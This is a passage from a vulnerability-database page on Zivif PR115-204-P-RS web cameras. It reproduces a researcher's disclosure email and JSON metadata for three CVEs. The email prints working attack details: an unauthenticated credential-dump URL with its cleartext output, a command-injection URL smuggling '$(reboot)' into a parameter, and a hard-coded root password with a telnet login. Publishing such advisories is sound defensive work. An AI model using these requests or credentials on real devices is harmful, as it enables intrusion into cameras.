3 vulnerabilities found for pr115-204-p-rs by zivif

VAR-201712-0830

Vulnerability from variot - Updated: 2023-12-18 12:37

Zivif PR115-204-P-RS V2.3.4.2103 web cameras contain a hard-coded cat1029 password for the root user. The SONIX operating system's setup renders this password unchangeable and it can be used to access the device via a TELNET session. Zivif web cameras contain a vulnerability related to the use of hard-coded credentials. Information may be obtained or altered, and service operation may be disrupted (DoS). The Zivif PR115-204-P-RS is a network camera device.

Attack vector: Remote
Authentication: None
Researcher: Silas Cutler `p1nk` <silas.cutler@blacklistthisdomain.com>
Release date: December 10, 2017
Full Disclosure: 90 days
CVEs: CVE-2017-17105, CVE-2017-17106, and CVE-2017-17107
Vulnerable Device: Zivif PR115-204-P-RS
Version: V2.3.4.2103

Timeline:
1 September 2017: Initial alerting to Zivif
1 September 2017: Zivif contact established.
3 September 2017: Details provided.
7 September 2017: Confirmation of vulnerabilities from Zivif
5 December 2017: Public note on Social Media CVE-2017-17105, CVE-2017-17106, and CVE-2017-17107 would be included in HackerStrip comic.
10 December 2017: This email

-[Overview]-
Implementation of access controls in Zivif cameras is severely lacking. As a result, CGI functions can be called directly, bypassing authentication checks.

This was first identified with the following request (CVE-2017-17106)
http://<Camera Address>/web/cgi-bin/hi3510/param.cgi?cmd=getuser

Cameras respond to this with:

var name0="admin"; var password0="admin"; var authLevel0="255"; var name1="guest"; var password1="guest"; var authLevel1="3"; var name2="admin2"; var password2="admin"; var authLevel2="3"; var name3=""; var password3=""; var authLevel3="3"; var name4=""; var password4=""; var authLevel4="3"; var name5=""; var password5=""; var authLevel5="3"; var name6=""; var password6=""; var authLevel6="3"; var name7=""; var password7=""; var authLevel7="3"; var name8=""; var password8=""; var authLevel8="0"; var name9=""; var password9=""; var authLevel9="0

Credentials are returned in cleartext to the requester.

In exploring, unauthenticated remote command injection is possible using (CVE-2017-17105)
http://<Camera IP>/cgi-bin/iptest.cgi?cmd=iptest.cgi&-time="1504225666237"&-url=$(reboot)

Command results are not returned, but the commands are executed by the system.

One last finding was the /etc/passwd file contains the following hard-coded entry (CVE-2017-17107):
root:$1$xFoO/s3I$zRQPwLG2yX1biU31a2wxN/:0:0::/root:/bin/sh

The encrypted password is cat1029.

(none) login: root
Password:
Login incorrect
(none) login: root
Password:
Welcome to SONIX.
\u@\h:\W$

Because of the way the file system is structured, changing this password requires more work than running passwd.

-[Note]-
The hi3510 is shared with a couple other cameras I'm exploring. The motd saying /Welcome to SONIX/ has led me to speculate parts of this firmware may be shared with other cameras.

-Silas

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201712-0830",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "pr115-204-p-rs",
        "scope": "eq",
        "trust": 3.0,
        "vendor": "zivif",
        "version": "2.3.4.2103"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-01358"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-011812"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-17107"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201712-145"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:zivif:pr115-204-p-rs_firmware:2.3.4.2103:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:zivif:pr115-204-p-rs:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-17107"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Silas Cutler",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "145386"
      }
    ],
    "trust": 0.1
  },
  "cve": "CVE-2017-17107",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 10.0,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2017-17107",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "CNVD-2018-01358",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "VHN-108096",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 3.9,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 9.8,
            "baseSeverity": "Critical",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2017-17107",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2017-17107",
            "trust": 1.8,
            "value": "CRITICAL"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2018-01358",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201712-145",
            "trust": 0.6,
            "value": "CRITICAL"
          },
          {
            "author": "VULHUB",
            "id": "VHN-108096",
            "trust": 0.1,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2017-17107",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-01358"
      },
      {
        "db": "VULHUB",
        "id": "VHN-108096"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-17107"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-011812"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-17107"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201712-145"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Zivif PR115-204-P-RS V2.3.4.2103 web cameras contain a hard-coded cat1029 password for the root user. The SONIX operating system\u0027s setup renders this password unchangeable and it can be used to access the device via a TELNET session. Zivif Web The camera contains a vulnerability related to the use of hard-coded credentials.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The ZivifPR115-204-P-RS is a network camera device. Attack vector: Remote\nAuthentication: None\nResearcher: Silas Cutler `p1nk` \u003csilas.cutler@blacklistthisdomain.com\u003e\nRelease date: December 10, 2017\nFull Disclosure: 90 days\nCVEs: CVE-2017-17105, CVE-2017-17106, and CVE-2017-17107\nVulnerable Device: Zivif PR115-204-P-RS\nVersion: V2.3.4.2103\n\n\nTimeline:\n1 September 2017: Initial alerting to Zivif\n1 September 2017: Zivif contact established. \n3 September 2017: Details provided. \n7 September 2017: Confirmation of vulnerabilities from Zivif\n5 December 2017: Public note on Social Media CVE-2017-17105,\nCVE-2017-17106, and CVE-2017-17107 would be included in HackerStrip comic. \n10 December 2017: This email\n\n\n-[Overview]-\nImplementation of access controls is Zivif cameras is severely lacking. \nAs a result, CGI functions can be called directly, bypassing\nauthentication checks. 
\n\nThis was first identified with the following request (CVE-2017-17106)\nhttp://\u003cCamera Address\u003e/web/cgi-bin/hi3510/param.cgi?cmd=getuser\nCameras respond to this with:\n\nvar name0=\"admin\"; var password0=\"admin\"; var authLevel0=\"255\"; var\nname1=\"guest\"; var password1=\"guest\"; var authLevel1=\"3\"; var\nname2=\"admin2\"; var password2=\"admin\"; var authLevel2=\"3\"; var name3=\"\";\nvar password3=\"\"; var authLevel3=\"3\"; var name4=\"\"; var password4=\"\";\nvar authLevel4=\"3\"; var name5=\"\"; var password5=\"\"; var authLevel5=\"3\";\nvar name6=\"\"; var password6=\"\"; var authLevel6=\"3\"; var name7=\"\"; var\npassword7=\"\"; var authLevel7=\"3\"; var name8=\"\"; var password8=\"\"; var\nauthLevel8=\"0\"; var name9=\"\"; var password9=\"\"; var authLevel9=\"0\nCredentials are returned in cleartext to the requester. \n\nIn exploring, unauthenticated remote command injection is possible using\n(CVE-2017-17105)\nhttp://\u003cCamera\nIP\u003e/cgi-bin/iptest.cgi?cmd=iptest.cgi\u0026-time=\"1504225666237\"\u0026-url=$(reboot)\n\nCommand results are not returned, however are executed by the system. \n\nOne last findings was the /etc/passwd file contains the following\nhard-coded entry (CVE-2017-17107):\nroot:$1$xFoO/s3I$zRQPwLG2yX1biU31a2wxN/:0:0::/root:/bin/sh\n\nThe encrypted password is cat1029. \n\n(none) login: root\nPassword:\nLogin incorrect\n(none) login: root\nPassword:\nWelcome to SONIX. \n\\u@\\h:\\W$\nBecause of the way the file system is structured, changing this password\nrequires more work then running passwd. \n\n-[Note]-\nThe hi3510 is shared with a couple other cameras I\u0027m exploring.  The\nmotd saying /Welcome to SONIX/ has lead me to speculate parts of this\nfirmware may be shared with other cameras. \n\n\n\n-Silas\n\n\n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-17107"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-011812"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2018-01358"
      },
      {
        "db": "VULHUB",
        "id": "VHN-108096"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-17107"
      },
      {
        "db": "PACKETSTORM",
        "id": "145386"
      }
    ],
    "trust": 2.43
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "PACKETSTORM",
        "id": "145386",
        "trust": 3.3
      },
      {
        "db": "NVD",
        "id": "CVE-2017-17107",
        "trust": 3.3
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-011812",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201712-145",
        "trust": 0.7
      },
      {
        "db": "CNVD",
        "id": "CNVD-2018-01358",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-108096",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-17107",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-01358"
      },
      {
        "db": "VULHUB",
        "id": "VHN-108096"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-17107"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-011812"
      },
      {
        "db": "PACKETSTORM",
        "id": "145386"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-17107"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201712-145"
      }
    ]
  },
  "id": "VAR-201712-0830",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-01358"
      },
      {
        "db": "VULHUB",
        "id": "VHN-108096"
      }
    ],
    "trust": 1.325
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-01358"
      }
    ]
  },
  "last_update_date": "2023-12-18T12:37:03.740000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Top Page",
        "trust": 0.8,
        "url": "http://zivif.com/"
      },
      {
        "title": "Exp101tsArchiv30thers",
        "trust": 0.1,
        "url": "https://github.com/nu11secur1ty/exp101tsarchiv30thers "
      },
      {
        "title": "awesome-cve-poc_qazbnm456",
        "trust": 0.1,
        "url": "https://github.com/xbl3/awesome-cve-poc_qazbnm456 "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2017-17107"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-011812"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-798",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-108096"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-011812"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-17107"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 3.3,
        "url": "http://packetstormsecurity.com/files/145386/zivif-pr115-204-p-rs-2.3.4.2103-bypass-command-injection-hardcoded-password.html"
      },
      {
        "trust": 2.6,
        "url": "https://twitter.com/silascutler/status/938052460328968192"
      },
      {
        "trust": 1.8,
        "url": "http://seclists.org/fulldisclosure/2017/dec/42"
      },
      {
        "trust": 0.9,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-17107"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-17107"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/798.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "http://\u003ccamera"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-17105"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-17106"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-01358"
      },
      {
        "db": "VULHUB",
        "id": "VHN-108096"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-17107"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-011812"
      },
      {
        "db": "PACKETSTORM",
        "id": "145386"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-17107"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201712-145"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-01358"
      },
      {
        "db": "VULHUB",
        "id": "VHN-108096"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-17107"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-011812"
      },
      {
        "db": "PACKETSTORM",
        "id": "145386"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-17107"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201712-145"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2018-01-19T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2018-01358"
      },
      {
        "date": "2017-12-19T00:00:00",
        "db": "VULHUB",
        "id": "VHN-108096"
      },
      {
        "date": "2017-12-19T00:00:00",
        "db": "VULMON",
        "id": "CVE-2017-17107"
      },
      {
        "date": "2018-01-29T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-011812"
      },
      {
        "date": "2017-12-13T16:50:24",
        "db": "PACKETSTORM",
        "id": "145386"
      },
      {
        "date": "2017-12-19T02:29:41.643000",
        "db": "NVD",
        "id": "CVE-2017-17107"
      },
      {
        "date": "2017-12-05T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201712-145"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2018-01-19T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2018-01358"
      },
      {
        "date": "2018-01-12T00:00:00",
        "db": "VULHUB",
        "id": "VHN-108096"
      },
      {
        "date": "2018-01-12T00:00:00",
        "db": "VULMON",
        "id": "CVE-2017-17107"
      },
      {
        "date": "2018-01-29T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-011812"
      },
      {
        "date": "2018-01-12T15:36:14.907000",
        "db": "NVD",
        "id": "CVE-2017-17107"
      },
      {
        "date": "2017-12-20T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201712-145"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201712-145"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Zivif Web Vulnerabilities related to the use of hard-coded credentials in cameras",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-011812"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "lack of information",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201712-145"
      }
    ],
    "trust": 0.6
  }
}

VAR-201712-0829

Vulnerability from variot - Updated: 2023-12-18 12:37

Credentials for Zivif PR115-204-P-RS V2.3.4.2103 Webcams can be obtained by an unauthenticated remote attacker using a standard web /cgi-bin/hi3510/param.cgi?cmd=getuser HTTP request. This vulnerability exists because of a lack of authentication checks in requests to CGI pages. Zivif web cameras contain a vulnerability related to certificate and password management. Information may be obtained or altered, and service operation may be disrupted (DoS). The Zivif PR115-204-P-RS is a network camera device.

Attack vector: Remote
Authentication: None
Researcher: Silas Cutler `p1nk` <silas.cutler@blacklistthisdomain.com>
Release date: December 10, 2017
Full Disclosure: 90 days
CVEs: CVE-2017-17105, CVE-2017-17106, and CVE-2017-17107
Vulnerable Device: Zivif PR115-204-P-RS
Version: V2.3.4.2103

Timeline:
1 September 2017: Initial alerting to Zivif
1 September 2017: Zivif contact established.
3 September 2017: Details provided.
7 September 2017: Confirmation of vulnerabilities from Zivif
5 December 2017: Public note on Social Media CVE-2017-17105, CVE-2017-17106, and CVE-2017-17107 would be included in HackerStrip comic.
10 December 2017: This email

-[Overview]-
Implementation of access controls in Zivif cameras is severely lacking.

This was first identified with the following request (CVE-2017-17106)
http://<Camera Address>/web/cgi-bin/hi3510/param.cgi?cmd=getuser

Cameras respond to this with:

var name0="admin"; var password0="admin"; var authLevel0="255"; var name1="guest"; var password1="guest"; var authLevel1="3"; var name2="admin2"; var password2="admin"; var authLevel2="3"; var name3=""; var password3=""; var authLevel3="3"; var name4=""; var password4=""; var authLevel4="3"; var name5=""; var password5=""; var authLevel5="3"; var name6=""; var password6=""; var authLevel6="3"; var name7=""; var password7=""; var authLevel7="3"; var name8=""; var password8=""; var authLevel8="0"; var name9=""; var password9=""; var authLevel9="0

Credentials are returned in cleartext to the requester.

In exploring, unauthenticated remote command injection is possible using (CVE-2017-17105)
http://<Camera IP>/cgi-bin/iptest.cgi?cmd=iptest.cgi&-time="1504225666237"&-url=$(reboot)

Command results are not returned, but the commands are executed by the system.

One last finding was the /etc/passwd file contains the following hard-coded entry (CVE-2017-17107):
root:$1$xFoO/s3I$zRQPwLG2yX1biU31a2wxN/:0:0::/root:/bin/sh

The encrypted password is cat1029.

(none) login: root
Password:
Login incorrect
(none) login: root
Password:
Welcome to SONIX.
\u@\h:\W$

Because of the way the file system is structured, changing this password requires more work than running passwd.

-[Note]-
The hi3510 is shared with a couple other cameras I'm exploring. The motd saying /Welcome to SONIX/ has led me to speculate parts of this firmware may be shared with other cameras.

-Silas

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201712-0829",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "pr115-204-p-rs",
        "scope": "eq",
        "trust": 3.0,
        "vendor": "zivif",
        "version": "2.3.4.2103"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-01359"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-011811"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-17106"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201712-146"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:zivif:pr115-204-p-rs_firmware:2.3.4.2103:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:zivif:pr115-204-p-rs:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-17106"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
